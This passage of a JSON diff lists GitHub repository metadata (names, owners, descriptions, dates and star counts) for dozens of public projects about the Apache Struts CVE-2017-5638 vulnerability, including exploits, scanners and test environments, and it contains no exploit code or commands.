"updated_at": "2021-04-24T13:16:56Z", + "pushed_at": "2017-04-04T19:57:38Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5638", + "struts-pwn" + ], + "visibility": "public", + "forks": 12, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 85145901, + "name": "Strutshock", + "full_name": "opt9\/Strutshock", + "owner": { + "login": "opt9", + "id": 192655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192655?v=4", + "html_url": "https:\/\/github.com\/opt9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/opt9\/Strutshock", + "description": "Struts2 RCE CVE-2017-5638 non-intrusive check shell script", + "fork": false, + "created_at": "2017-03-16T02:59:22Z", + "updated_at": "2021-09-30T13:38:46Z", + "pushed_at": "2017-03-16T04:02:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 85341283, + "name": "StrutsShell", + "full_name": "falcon-lnhg\/StrutsShell", + "owner": { + "login": "falcon-lnhg", + "id": 5199658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5199658?v=4", + "html_url": "https:\/\/github.com\/falcon-lnhg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/falcon-lnhg\/StrutsShell", + "description": "Apache Struts (CVE-2017-5638) Shell", + "fork": false, + "created_at": "2017-03-17T18:05:55Z", + "updated_at": "2023-01-10T03:17:50Z", + "pushed_at": "2017-04-04T16:11:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 85390529, + "name": "CVE-2017-5638", + "full_name": "bhagdave\/CVE-2017-5638", + "owner": { + "login": "bhagdave", + "id": 3230037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3230037?v=4", + "html_url": "https:\/\/github.com\/bhagdave", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhagdave\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-03-18T09:39:59Z", + "updated_at": "2017-03-19T01:25:24Z", + "pushed_at": "2017-03-21T21:53:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 85733752, + "name": "S2-046_S2-045_POC", + "full_name": "KarzsGHR\/S2-046_S2-045_POC", + "owner": { + "login": "KarzsGHR", + "id": 12841587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12841587?v=4", + "html_url": "https:\/\/github.com\/KarzsGHR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KarzsGHR\/S2-046_S2-045_POC", + "description": "S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)", + "fork": false, + "created_at": "2017-03-21T17:36:40Z", + "updated_at": "2019-11-20T02:42:35Z", + "pushed_at": "2017-04-26T09:12:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5638", + "s2-045", + "s2-046" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 85926594, + "name": "S2-Reaper", + "full_name": "gsfish\/S2-Reaper", + "owner": { + "login": "gsfish", + "id": 15968154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15968154?v=4", + "html_url": "https:\/\/github.com\/gsfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gsfish\/S2-Reaper", + "description": "CVE-2017-5638", + "fork": false, + "created_at": "2017-03-23T08:44:10Z", + "updated_at": "2017-03-30T09:51:23Z", + "pushed_at": "2017-03-30T10:06:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 86200933, + "name": "cve-2017-5638", + "full_name": "mcassano\/cve-2017-5638", + "owner": { + "login": "mcassano", + "id": 2073030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2073030?v=4", + "html_url": "https:\/\/github.com\/mcassano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mcassano\/cve-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-03-26T01:58:52Z", + "updated_at": "2017-03-26T02:00:58Z", + "pushed_at": "2017-04-01T04:20:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 86415022, + "name": "Strutscli", + "full_name": "opt9\/Strutscli", + "owner": { + "login": "opt9", + "id": 192655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192655?v=4", + "html_url": "https:\/\/github.com\/opt9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/opt9\/Strutscli", + "description": "Struts2 RCE CVE-2017-5638 CLI shell", + "fork": false, + "created_at": "2017-03-28T04:31:44Z", + "updated_at": "2017-04-14T08:03:48Z", + "pushed_at": "2017-03-28T04:36:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 87695524, + "name": "strutsy", + "full_name": "tahmed11\/strutsy", + "owner": { + "login": "tahmed11", + "id": 25324534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25324534?v=4", + "html_url": "https:\/\/github.com\/tahmed11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tahmed11\/strutsy", + "description": "Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability", + "fork": false, + "created_at": "2017-04-09T08:57:08Z", + "updated_at": "2024-08-12T19:28:58Z", + "pushed_at": "2018-09-01T10:15:30Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 90377429, + "name": "CVE-2017-5638", + "full_name": "payatu\/CVE-2017-5638", + "owner": { + "login": "payatu", + "id": 16715624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16715624?v=4", + "html_url": "https:\/\/github.com\/payatu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/payatu\/CVE-2017-5638", + "description": "Apache Struts 2.0 RCE vulnerability - Allows an attacker to inject OS commands into a web application through the content-type header ", + "fork": false, + "created_at": "2017-05-05T13:17:37Z", + "updated_at": "2024-08-12T19:29:37Z", + "pushed_at": "2017-05-05T13:55:53Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 92562840, + "name": "Struts2-045-Exp", + "full_name": "Aasron\/Struts2-045-Exp", + "owner": { + "login": "Aasron", + "id": 17878407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17878407?v=4", + "html_url": "https:\/\/github.com\/Aasron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aasron\/Struts2-045-Exp", + "description": "CVE-2017-5638", + "fork": false, + "created_at": "2017-05-27T02:03:28Z", + "updated_at": "2017-05-27T02:33:31Z", + "pushed_at": "2017-06-01T09:53:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 92638419, + "name": "Stutsfi", + "full_name": "SpiderMate\/Stutsfi", + "owner": { + "login": "SpiderMate", + "id": 26036081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26036081?v=4", + "html_url": "https:\/\/github.com\/SpiderMate", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiderMate\/Stutsfi", + "description": "An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2", + "fork": false, + "created_at": "2017-05-28T03:48:10Z", + "updated_at": "2020-08-10T00:48:43Z", + "pushed_at": "2018-01-13T04:19:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 92644725, + "name": "Struts2Shell", + "full_name": "jpacora\/Struts2Shell", + "owner": { + "login": "jpacora", + "id": 2137673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2137673?v=4", + "html_url": "https:\/\/github.com\/jpacora", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jpacora\/Struts2Shell", + "description": "An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.", + "fork": false, + "created_at": "2017-05-28T06:44:13Z", + "updated_at": "2023-05-25T03:31:02Z", + "pushed_at": "2017-06-03T06:33:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 93442387, + "name": "CVE-2017-5638", + "full_name": "AndreasKl\/CVE-2017-5638", + "owner": { + "login": "AndreasKl", + "id": 1105899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1105899?v=4", + "html_url": "https:\/\/github.com\/AndreasKl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreasKl\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-06-05T20:11:06Z", + "updated_at": "2020-10-14T14:40:32Z", + "pushed_at": "2017-06-05T21:43:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 93710291, + "name": "struts-rce-cve-2017-5638", + "full_name": "riyazwalikar\/struts-rce-cve-2017-5638", + "owner": { + "login": "riyazwalikar", + "id": 1900486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1900486?v=4", + "html_url": "https:\/\/github.com\/riyazwalikar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/riyazwalikar\/struts-rce-cve-2017-5638", + "description": "Struts-RCE CVE-2017-5638", + "fork": false, + "created_at": "2017-06-08T05:22:31Z", + "updated_at": "2017-06-08T08:18:51Z", + "pushed_at": "2017-06-08T05:25:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 93794473, + "name": "CVE-2017-5638", + "full_name": "homjxi0e\/CVE-2017-5638", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-06-08T21:47:11Z", + "updated_at": "2017-06-08T21:47:11Z", + "pushed_at": "2017-06-08T21:48:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 94180453, + "name": "CVE-2017-5638", + "full_name": "eeehit\/CVE-2017-5638", + "owner": { + "login": "eeehit", + "id": 22052276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22052276?v=4", + "html_url": "https:\/\/github.com\/eeehit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eeehit\/CVE-2017-5638", + "description": "CVE-2017-5638 Test environment", + "fork": false, + "created_at": "2017-06-13T06:59:15Z", + "updated_at": "2017-06-13T07:07:06Z", + "pushed_at": "2017-06-13T07:00:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5638", + "dockerfile", + "war" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 95873695, + "name": "Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner", + "full_name": "sUbc0ol\/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner", + "owner": { + "login": "sUbc0ol", + "id": 24601456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24601456?v=4", + "html_url": "https:\/\/github.com\/sUbc0ol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sUbc0ol\/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner", + "description": null, + "fork": false, + "created_at": "2017-06-30T09:40:31Z", + "updated_at": "2024-08-12T19:30:59Z", + "pushed_at": "2017-06-30T09:41:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 95874930, + "name": "Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638", + "full_name": "sUbc0ol\/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638", + "owner": { + "login": "sUbc0ol", + "id": 24601456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24601456?v=4", + "html_url": "https:\/\/github.com\/sUbc0ol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sUbc0ol\/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-06-30T09:55:41Z", + "updated_at": "2024-08-12T19:30:59Z", + "pushed_at": "2017-06-30T09:57:01Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 13, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 98150795, + "name": "Apache-Struts-2-CVE-2017-5638-Exploit-", + "full_name": "R4v3nBl4ck\/Apache-Struts-2-CVE-2017-5638-Exploit-", + "owner": { + "login": "R4v3nBl4ck", + "id": 30399308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30399308?v=4", + "html_url": "https:\/\/github.com\/R4v3nBl4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R4v3nBl4ck\/Apache-Struts-2-CVE-2017-5638-Exploit-", + "description": "Exploit created by: R4v3nBl4ck end Pacman", + "fork": false, + "created_at": "2017-07-24T05:05:28Z", + "updated_at": "2024-08-12T19:31:31Z", + "pushed_at": "2017-07-24T23:55:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100141854, + "name": "CVE-2017-5638", + "full_name": "Xhendos\/CVE-2017-5638", + "owner": { + "login": "Xhendos", + "id": 16403693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16403693?v=4", + "html_url": "https:\/\/github.com\/Xhendos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xhendos\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-08-12T23:00:14Z", + "updated_at": "2017-08-12T23:04:13Z", + "pushed_at": "2017-08-26T17:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 101267457, + "name": "Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner", + "full_name": "TamiiLambrado\/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner", + "owner": { + "login": "TamiiLambrado", + "id": 23249848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23249848?v=4", + "html_url": "https:\/\/github.com\/TamiiLambrado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TamiiLambrado\/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner", + "description": null, + "fork": false, + "created_at": "2017-08-24T07:36:14Z", + "updated_at": "2017-08-24T07:36:14Z", + "pushed_at": "2017-08-24T07:36:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 104686879, + "name": "strutser", + "full_name": "invisiblethreat\/strutser", + "owner": { + "login": "invisiblethreat", + "id": 2525006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2525006?v=4", + "html_url": "https:\/\/github.com\/invisiblethreat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invisiblethreat\/strutser", + "description": "Check for Struts Vulnerability CVE-2017-5638", + "fork": false, + "created_at": "2017-09-25T00:40:57Z", + "updated_at": "2019-06-11T14:15:40Z", + "pushed_at": "2017-09-28T21:10:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5638", + "struts" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 105124155, + "name": "CVE-2017-5638", + "full_name": "lizhi16\/CVE-2017-5638", + "owner": { + "login": "lizhi16", + "id": 22630810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22630810?v=4", + "html_url": "https:\/\/github.com\/lizhi16", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lizhi16\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-09-28T08:43:21Z", + "updated_at": "2024-09-16T14:01:51Z", + "pushed_at": "2018-03-25T02:49:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 107489354, + "name": "Apache-Struts", + "full_name": "c002\/Apache-Struts", + "owner": { + "login": "c002", + "id": 26592580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26592580?v=4", + "html_url": "https:\/\/github.com\/c002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c002\/Apache-Struts", + "description": " An exploit for Apache Struts CVE-2017-5638", + "fork": false, + "created_at": "2017-10-19T02:40:45Z", + "updated_at": "2020-05-17T04:32:06Z", + "pushed_at": "2017-05-28T14:03:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 108805305, + "name": "Common-Vulnerability-and-Exploit", + "full_name": "donaldashdown\/Common-Vulnerability-and-Exploit", + "owner": { + "login": "donaldashdown", + "id": 24925373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24925373?v=4", + "html_url": "https:\/\/github.com\/donaldashdown", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/donaldashdown\/Common-Vulnerability-and-Exploit", + "description": "This is the Apache Struts CVE-2017-5638 struts 2 vulnerability. The same CVE that resulted in the equifax database breach.", + "fork": false, + "created_at": "2017-10-30T05:21:53Z", + "updated_at": "2023-09-18T14:46:19Z", + "pushed_at": "2017-11-11T23:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 117999664, + "name": "cybersecurity-struts2", + "full_name": "sighup1\/cybersecurity-struts2", + "owner": { + "login": "sighup1", + "id": 28523112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28523112?v=4", + "html_url": "https:\/\/github.com\/sighup1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sighup1\/cybersecurity-struts2", + "description": "Struts2 Application Vulnerable to CVE-2017-5638. Explains how the exploit of the vulnerability works in relation to OGNL and the JakartaMultiPart parser.", + "fork": false, + "created_at": "2018-01-18T15:19:39Z", + "updated_at": "2019-01-23T00:39:32Z", + "pushed_at": "2019-01-23T00:39:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 119230111, + "name": "apache-struts-v2-CVE-2017-5638", + "full_name": "cafnet\/apache-struts-v2-CVE-2017-5638", + "owner": { + "login": "cafnet", + "id": 12993208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12993208?v=4", + "html_url": "https:\/\/github.com\/cafnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cafnet\/apache-struts-v2-CVE-2017-5638", + "description": "Working POC for CVE 2017-5638", + "fork": false, + "created_at": "2018-01-28T05:17:04Z", + "updated_at": "2018-01-28T05:55:11Z", + "pushed_at": "2018-01-28T05:55:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 121659152, + "name": "CVE-2017-5638", + "full_name": "0x00-0x00\/CVE-2017-5638", + "owner": { + "login": "0x00-0x00", + "id": 23364530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-0x00\/CVE-2017-5638", + "description": "Struts02 s2-045 exploit program", + "fork": false, + "created_at": "2018-02-15T17:31:07Z", + "updated_at": "2023-08-09T21:34:49Z", + "pushed_at": "2018-02-15T17:36:07Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 123348547, + "name": "struts2_cve-2017-5638", + "full_name": "m3ssap0\/struts2_cve-2017-5638", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/struts2_cve-2017-5638", + "description": "This is a sort of Java porting of the Python exploit at: https:\/\/www.exploit-db.com\/exploits\/41570\/.", + "fork": false, + "created_at": "2018-02-28T22:11:50Z", + "updated_at": "2018-03-17T10:17:06Z", + "pushed_at": "2018-03-10T11:56:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5638", + "exploit", + "security", + "security-tools", + "struts2", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 125206287, + "name": "struts2-jakarta-inject", + "full_name": "Greynad\/struts2-jakarta-inject", + "owner": { + "login": "Greynad", + "id": 5173529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5173529?v=4", + "html_url": "https:\/\/github.com\/Greynad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greynad\/struts2-jakarta-inject", + "description": "Golang exploit for CVE-2017-5638", + "fork": false, + "created_at": "2018-03-14T12:04:34Z", + "updated_at": "2018-03-28T19:59:04Z", + "pushed_at": "2018-03-19T17:57:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 126003106, + "name": "struts-rce", + "full_name": "ggolawski\/struts-rce", + "owner": { + "login": "ggolawski", + "id": 35563296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35563296?v=4", + "html_url": "https:\/\/github.com\/ggolawski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggolawski\/struts-rce", + "description": "Apache Struts CVE-2017-5638 RCE exploitation", + "fork": false, + "created_at": "2018-03-20T10:51:46Z", + "updated_at": "2018-05-18T09:54:51Z", + "pushed_at": "2018-03-20T11:32:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 133253539, + "name": "CVE-2017-5638", + "full_name": "win3zz\/CVE-2017-5638", + "owner": { + "login": "win3zz", + "id": 12781459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12781459?v=4", + "html_url": "https:\/\/github.com\/win3zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/win3zz\/CVE-2017-5638", + "description": "Apache Struts 2.3.5 < 2.3.31 \/ 2.5 < 2.5.10 - Remote Code Execution - Shell Script", + "fork": false, + "created_at": "2018-05-13T16:13:26Z", + "updated_at": "2024-08-12T19:38:31Z", + "pushed_at": "2018-05-13T16:14:53Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 138520346, + "name": "CVE-2017-5638-Mass-Exploit", + "full_name": "leandrocamposcardoso\/CVE-2017-5638-Mass-Exploit", + "owner": { + "login": "leandrocamposcardoso", + "id": 13025156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13025156?v=4", + "html_url": "https:\/\/github.com\/leandrocamposcardoso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leandrocamposcardoso\/CVE-2017-5638-Mass-Exploit", + "description": null, + "fork": false, + "created_at": "2018-06-24T22:40:54Z", + "updated_at": "2018-06-24T22:41:48Z", + "pushed_at": "2020-06-07T07:06:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 138721867, + "name": "struts2-rce", + "full_name": "Iletee\/struts2-rce", + "owner": { + "login": "Iletee", + "id": 1454138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1454138?v=4", + "html_url": "https:\/\/github.com\/Iletee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Iletee\/struts2-rce", + "description": "Exploitable target to CVE-2017-5638", + "fork": false, + "created_at": "2018-06-26T10:21:50Z", + "updated_at": "2023-06-06T07:37:48Z", + "pushed_at": "2023-02-09T13:32:09Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 161, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 161, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 147389150, + "name": "check_struts", + "full_name": 